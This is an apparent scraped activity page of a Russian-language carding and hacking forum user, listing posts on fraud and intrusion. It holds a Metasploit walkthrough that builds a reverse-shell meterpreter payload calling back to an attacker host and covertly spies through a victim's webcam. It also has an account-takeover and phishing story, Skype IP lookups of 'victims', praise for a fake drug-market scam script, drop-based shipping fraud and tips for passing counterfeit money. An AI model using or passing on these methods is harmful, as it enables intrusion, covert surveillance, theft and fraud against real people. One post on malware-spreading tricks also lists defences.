-
Content Count
211 -
Joined
-
Last visited
-
Days Won
2 -
Time Online
17м 40с
My Favorite Songs
Шагоход last won the day on June 15 2022
Шагоход had the most liked content!
Дополнительная информация
-
Регион
Пхукет
-
Квалификация
Фишер
Торговая информация
- Сделок: 7 Сделок: 7
- Депозит: 0 Депозит: 0
Recent Profile Visitors
19889 profile views
-
Получаем бесплатный адрес в США. Посредник usmedexport.com
Шагоход posted a topic in Social engineering
Роясь на просторах инета совершенно случайно наткнулся на конторку usmedexport.com , которая предоставляет абсолютно бесплатно адрес в сша. После регистрации в данной системе Вы получите личный американский почтовый адрес (место на складе USMedExport в штате ILLINOIS). Указывая его во время покупок как SHIPPING ADDRESS - адрес доставки покупок в США, (используя ваши банковские карты Visa, Master Card или PayPal) сможете самостоятельно, без посредников заказать / купить в США: модную, недорогую одежду и обувь, популярную электронику, фирменные авто-мото запчасти, профессиональные инструменты и любые товары из магазинов США, включая Amazon и аукцион eBay, а USMedExport перешлет Вам ваши покупки. Регистрируйтесь, подтверждайте свой email, и сразу начинайте покупать в США самостоятельно и без посредников! Работают с огромным количеством шопов в том числе с ебей и амазон. Полный список можно посмотреть на сайте этого посредника. Так же там подробно расписаны все подробности их работы. И условия использования. Все что вам нужно будет внести данные дропа из ру или снг при регисрации и можно идти закупаться. на полноценную статью не катит но думаю пригодится. так же там есть платные услуги кому интересно можно ознакомится там же на сайте. -
Методы социальной инженерии, используемые для распространения вредоносного ПО
Шагоход posted a topic in Social engineering
В последнее время одним из самых эффективных способов распространения вредоносного ПО является социальная инженерия. Как показывает практика, дыры в ПО рано или поздно закрываются, а в мозгу пользователей все обстоит не так радужно… К примеру, не так давно Microsoft выпустила патч наглухо отключающие авторан с флэш-накопителей. Да и многие антивирусные продукты взяли на вооружение запрет файла autorun.inf. Казалось бы это должно подкосить волну малвари, использующей для распространения съемные диски. Ан нет! Почему..? Врожденное любопытство толкает людей на многие необдуманные поступки. Раз нельзя автоматически запустить, надо заставить пользователя сделать это! Я попытался сгруппировать самые распространенные методы социальной инженерии, которые используют злоумышленники для распространения вредоносного ПО и дать некоторые советы по защите. 1. Подмена иконки файла Исполняемый файл маскируется под папку, легитимное приложение, либо тип файла с помощью соответствующей иконки. Вечно спешащий пользователь тычет мышкой и запускает файл на исполнение. Защита: Приучите себя использовать файловые менеджеры типа Total Commander и т.п. Если вы все-таки используете проводник Windows, старайтесь работать с табличным отображением файлов и обращать внимание на типа файла, прежде чем щелкать по нему мышью (особенно при работе с файлами со съемных и сетевых дисков). 2. Интригующее название файла Интригующее название исполняемого файла, подбивающее пользователя запустить его (например, «Не открывать.scr»). Защита: У грамотного пользователя подобные названия сразу должны вызывать подозрения. Проверьте тип файла в файловом менеджере, если это *.exe, *.scr, *.bat, *.vbs, то лучше не надо его трогать. Если это исполняемый файл, а руки так и чешутся запустить, хотя бы проверьте его на virustotal, правда первые несколько дней свежая малварь практически не детектится антвирусами. 3. Игра на стремлении пользователя получить доступ к вожделенному контенту Пользователь завлекается на сайт злоумышленника, под предлогом доступа к контенту (видео, например) ему предлагается скачать кодек\драйвер\распаковщик. Любопытство в очередной раз берет верх над разумом… Защита: Никогда не переходите по таким ссылкам и тем более не запускайте если все-таки скачали. Да, установка специального кодека для просмотра видео, например, необходима на некоторых легальных сайтах встраивающих рекламу в ролик. Оно вам надо? Лучше найти тоже самое в другом месте. Используйте антифишинговые фильтры встроенные в современные браузеры и антивирусы, не игнорируйте их предупреждения. 4. Имитация живого общения То, что на электронную почту и в различные мессенджеры сыпятся сообщения с мольбами отправить SMS или ткнуть в ссылку уже никого не удивляет, к счастью большинство пользователей научились не обращать на это внимание. Поэтому злодеи осваивают новые способы. В январе этого года пользователи ICQ подверглись атаке малвари «Piggy.zip» или "H1N1", которая заражая компьютер пользователя, рассылалась всем его контактам, мало того, в ответ на фразы вроде «что за вирус на...???» и «ты бот?», вполне впопад отвечала «нет, это флешка про свинью, глянь » или «сам ты бот =». Как показал анализ кода, вирус просто ищет в сообщении ключевые слова (спамер, вирус, бот и т.п.) и выкидывает фразу как-то коррелирующую со смыслом ключевого слова. При всей простоте реализации «интеллекта» такой подход оказался чрезвычайно эффективным! Очень многие пользователи, считавшие себя относительно продвинутыми в области компьютерной безопасности попались на крючок. Страшно подумать, что будет если встроить нормальный чат-бот в подобного трояна… Справедливости ради стоит отметить, что первый подобный случай был аж в 2005. Защита: Не принимайте файлы и не переходите по ссылкам, полученным от незнакомых контактов. При приеме файлов, даже от лучших друзей, обращайте внимание на подозрительную смену стиля и манеры общения, лучше еще несколько раз попросить описать содержимое файла. 5. «Дорожное яблоко» Благодаря тотальному удешевлению различных носителей информации, в частности флэш, злоумышленник может не пожалеть подбросить диск или флэшку с трояном прямо вам на порог. Жгучее желание посмотреть что же там такое, скорее всего, возьмет верх, пользователь подключит диск и активирует малварь (вполне возможно одним из вышеперечисленных способов), чего и добивался злоумышленник! Защита: Проверять на отдельной изолированной машине все поступающие в компанию из непроверенных источников носители информации. Если вы работаете в серьезной компании и «вдруг» что-то нашли по дороге на работу следует воздержаться от самостоятельных экспериментов и передать носитель в службу IT-безопасности для проверки. С другой стороны, если вы обычный студент или водопроводчик, вряд ли кто-то будет специально разбрасывать перед вами флэшки. Тем не менее, лучше проверять находки на содержимое в виртуальной машине. 6. Эксплуатация страхов пользователя Как правило, человека пытаются убедить в том, что его компьютер кишит вирусами, личные данные и пароли утекают хакерам, с его IP якобы рассылается спам и т.д. Для решения всех проблем предлагается незамедлительно скачать и установить некий «антивирус» (будьте внимательны, многие из этих «решений» полностью копируют интерфейс широко известных продуктов). После установки происходит либо блокировка системы, с требованием оплатить «лицензию продукта», либо просто на компьютер пользователя пачками скачивается другая малварь, с каким угодно функционалом. Защита Никогда не реагируйте на предупреждения, всплывающие на разных сомнительных сайтах о том, что ваш компьютер заражен, вам угрожает опасность и т.п. Пользуйтесь только известными марками антивирусов, всегда скачивайте дистрибутивы исключительно с официального сайта компании. -
Хочу немного улучшить первый вариант и согласиться с Кладовщиком. Так как зачем создавать для каждого отдельную страничку, если с одной можно разводить намного больше людей? Лучше одну, но постоянную.
-
Залив грязи на ФИЗ, ЮР, ОФФШОРЫ от Инфектеда
Шагоход replied to INFECTED MASH's topic in VERIFIED SERVICES
@VASEK53 А после того как поскидываешь пруфы хер знает кому не будешь переживать за то что можешь поехать баланду жрать?))Вроде не тупой а на таких элементарных вещах готов сам же попалиться. -
@88lucifer98 Проверь
-
Metasploit. Взлом Windows 7 (подсматриваем через web-камеру)
Шагоход posted a topic in Social engineering
Всем привет! Давайте сегодня поговорим об одном из возможных взломов Windows 7, плюс ко всему будем подглядывать через web-камеру. Web-камера давным давно стала неотъемлемой частью аппаратного обеспечения компьютера и не важно ноутбук это или стационар. К тому же большой процент пользователей до сих пор используют Windows XP и Windows 7, на которые уязвимостей выше крыши. Ко всему этому можно добавить неумение пользователями настраивать свою ОС, что уже играет немаловажную роль! Итак, давайте воспользуемся одной из давно найденных, но до сих пор работающих уязвимостей для Windows 7, которая затрагивает UAC (User Account Control). Он ней вы можете прочитать: Windows zero-day flaw bypasses UAC! New Windows Vulnerability Bypasses UAC Bypassing UAC with User Privilege under Windows Vista/7 Уязвимость User Account Control (UAC) в Windows 7 Для начала нам нужно, создать вредоносный исполняемый файл run_me.exe, который в BackTrack создается так, как показано ниже: # msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 X > /root/Desktop/run_me.exe LHOST=192.168.1.5 – IP-адрес атакующего LPORT=4444 – порт атакующего Запускаем Metasploit: # msfconsole Далее вводим команды: > use exploit/multi/handler > set payload windows/meterpreter/reverse_tcp > set lhost 192.168.1.5 > exploit Теперь нам нужно, что пользователь запустил файл run_me.exe. Как это добиться уже другая история, как вариант можно засунуть вредоносный файл в другой файл. Например, как скрыть/склеить exe-файл в jpg можете прочитать тут. Это не единственный вариант, поэтому вооружайтесь googl’ом. После того, когда жертва запустит файл, мы получим контроль над системой с привилегиями SYSTEM. Теперь можно делать все, что угодно! Но сейчас будем подсматривать за пользователем. Сначала посмотрим, есть ли вообще у него web-камера? meterpreter > webcam_list 1: Logitech Webcam 120 Да нам повезло! Имеется одна web-камера: Logitech Webcam 120. Теперь сделаем снимок: meterpreter > webcam_snap Так же можно попробовать запустить web-камеру в режиме реального времени. Делается это следующей командой: meterpreter > run webcam -p /var/www После чего откроется браузер и вы будете видеть то, что видит камера. Если браузер не откроется, значит откройте его сами и в адресной строке введите: /var/www/webcam.html На этом все! Как видите ничего сложного нет. Если возникнут вопросы, обращайтесь. -
Практический пример социальной инженерии или «Любимое блюдо?» (Часть 1)
Шагоход posted a topic in Social engineering
На этой неделе были приданы огласке несколько «сливов», связанных с почтовыми системами: отmail.ru, от yandex, информация о взломе почты Сатоси Накомото. В связи с этими событиями вспомнилась история, рассказанная «одним моим знакомым» про то, как невозможное стало возможным благодаря социальной инженерии и доступу к ящику на mail.ru. Итак, однажды ему прислали ссылку на сайт, посвященный статьям об обмане электросчетчиков с просьбой узнать, а можно ли на этом сайте «купить без денег» информацию? Данный сайт был полностью статическим и хостился, если мне не изменяет память, на одном из условно-бесплатных хостингов, кажется это был h1.ru. На сайте на тот момент было 15 разнообразных методов остановки или отмотки бытовых электросчетчиков. Каждый метод, судя по описанию, представлял из себя подробную пошаговую инструкцию. В кратком описании метода находилось несколько принципиальных схем «для затравки», полную инструкцию можно было приобрести отправив заявку на email в домене mail.ru. В ответ на заявку сбрасывались реквизиты для оплаты, после оплаты на email в ручном режиме высылался заказанный файл с инструкциями. Единственной зацепкой для поиска следов файлов с полными инструкциями стал email. От которого мой знакомый, естественно «Забыли пароль?». Форма восстановления пароля предложила вспомнить «Любимое блюдо?», машинально, не особо надеясь на успех в голове промелькнул набор «пиво/водка/борщ/макароны». Можете представить его удивление, когда первое же слово из набора предложило ввести новый пароль для почтового ящика. Однако, предвкушению легкой возможности, скачать все методы разом в виде вложений из папки отправленных сообщений, не суждено было сбыться. Вэб интерфейсом, судя по всему, ни разу не пользовались, во входящих были только письма-запросы на приобретение того или иного метода и несколько сканов платежек, подтверждающих оплату. Отправка файлов происходила из почтовой программы, не сохраняя отправленные сообщения на сервере или вообще с другого почтового ящика. Утешительным призом стало единственное письмо с файлом-вложением от покупателя, который не смог открыть присланный ему файл. Бочкой дегтя в этой ложке меда на тот момент стала пропажа доступа к почтовому ящику — владелец восстановил пароль и сменил ответ на секретный вопрос. В соответствии с принципом «Хорошая мысля приходит опосля» в голове уже имелся план по получению всех предлагаемых методов (думаю, уже понятный читателю этих строк), но не было доступа к почтовому ящику продавца… На следующий день, пробуя очередной набор ответов из серии «фуа-гра/хатиноко/балют», mail.ru настойчиво предложил указать дополнительную информацию о почтовом ящике, чтобы получить к нему доступ. Приняв предложение, через форму обратной связи была выслана слезная история, о своем любимом блюде «пиво» и о зловредных троянах, которые непонятно каким способом увели драгоценный ящик, как раз в момент прочтения последнего письма, которое пришло От: «xxx» В:«yyy» С Темой:«zzz»… и это СРАБОТАЛО! В течении часа на указанный контактный email пришла ссылка на восстановление пароля. Однако на этот раз перед сбросом пароля был выполнен ряд приготовлений, а именно: подготовлен список рассылки на всех отправителей сообщений из папки входящие. Текст рассылки был самый что ни на есть безобидный, ведь оказалось, что именно сегодня ресурс по отмотке счетчиков праздновал свой 3х летний юбилей и в качестве подарка своим постоянным заказчикам предлагал на выбор любой из имеющихся методов в подарок. Для подтверждения статуса «постоянного заказчика» нужно было всего-лишь в письме-запросе подарка вложить файл с приобретенным ранее методом. Рассылка прошла, в течении 3х часов на руках были все имеющиеся у ресурса файлы-методы, а 15 участников даже получили подарок, в соответствии со своим письмом-запросом. После чего доступ к ящику был безвозвратно утерян и по сей день принадлежит истинному владельцу, который, не меняя схемы, все также продает «схемы и способы обмана счетчиков». P.S. Естественно все описанные в хабе события и персонажи вымышленные, а любые совпадения случайны. UPD: «Купить без денег» методы просили люди, которые эти счетчки проектировали, для понимания насколько их вариант защищен. -
Заходим на сайт http://zadarma.com Регистрируемся при регистрации выбираем тариф бесплатный Подтверждаем почту и все готово. Сразу после регистрации Вы получаете 30 бесплатных минут для звонков в любую из 35 стран мира. Далее Вы можете использовать до 400 бесплатных минут в течение двух месяцев. P.S. Должен быть установлен флэш плеер, плюс через оперу не получалось дать разрешение на микрофон, а через хром все нормально заработало.
-
Первый способ. Есть спец.сайты которые по логину скайпа определяют ip. Вам нужно только вписать скайп жерты и нажать resolve Первый сайт.(самый лучший): anonware.net/resolver/skype.php Второй сайт: skypelookup.pw/index.php Третий сайт: res0lve.com P.S Лучше вычислять когда жертва в сети, а то у плохом случае выдаст вам левый айпи. Второй способ. Этот способ 100% вычисляет ip. Для начала нам нужно вызвать диспетчер задач. Вызвать его можно через комбинацию CTRL+ALT+DELETE или CTRL+Caps Lock+Esc. Далле нажимаем на вкладку Производительность и ниже кликаем "Открыть мониторинг ресурсов" И там мы кликаем на вкладку сеть. Далее передаем любой файл нашей жертве и заходим во вкладку Сетевая активность. Там у вас в столбце "Образ" будет написано skype.exe и в столбце адрес будет написан айпи нашей жертвы.
-
Ros reacted to a post in a topic: Краткое введение в социальную инженерию
-
nervous reacted to a post in a topic: Кардерские и Хакерские форумы
-
Риск зависит от того на сколько далеко ты готов шагать в этом направлении.
-
Шагоход reacted to a post in a topic: Опасность легкодоступных VPN и Proxi
-
samyrai_12 started following Шагоход
-
12211221 reacted to a post in a topic: Стимуляторы для мозга
-
Ivan200417 started following Шагоход
-
@Дмитрий Задерей Пушка,которая стреляет ебическими ядрами.Монеты капают постоянно,по херне но много.На первых парах снял более 100к деревянных.Бери не пожалеешь!
- 50 replies
-
- фейк гидры
- фейк hydra
-
(and 4 more)
Tagged with:
-
Очень интересный скрипт,не встречал ничего подобного.Тема по нарко всегда будет в топе и чем строже закон тем прибыльнее дело.С удовольствием стану первым покупателем,естественно покупать буду через гарант.@BOTNET Жду в ЛС,хочу задать вопросов перед покупкой.
- 50 replies
-
- фейк гидры
- фейк hydra
-
(and 4 more)
Tagged with:
-
Купить фальшивые и поддельные деньги: Рубли, Доллары, Евро, Тенге, Гривни
Шагоход replied to МАСТЕР КЛИШЕ's topic in VERIFIED SERVICES
Такое ощущение что люди не фальшь пришли покупать, а технику в интернет магазине) 1) Созванивайся с продавцами всегда с новой симкарты, при этом из консперативного места (лучше работать вдвоем или втроем) 2) Не перемещайся на машине, даже если ты ее оставишь в соседнем квартале тебя по камерам срисуют в 2 счета. Перемещайся на мотике в шлеме. 3) Не сбывай товар в регионе где закупаешься 4) не работай долго в одном регионе В День реально закупаться на 500.000Р (это ноутбуки, фототехника, самый основной товар)- 713 replies
-
- заказать фальшивые деньги
- банкомат фальшивые купюры
- (and 15 more)
-
Samara6378 started following Шагоход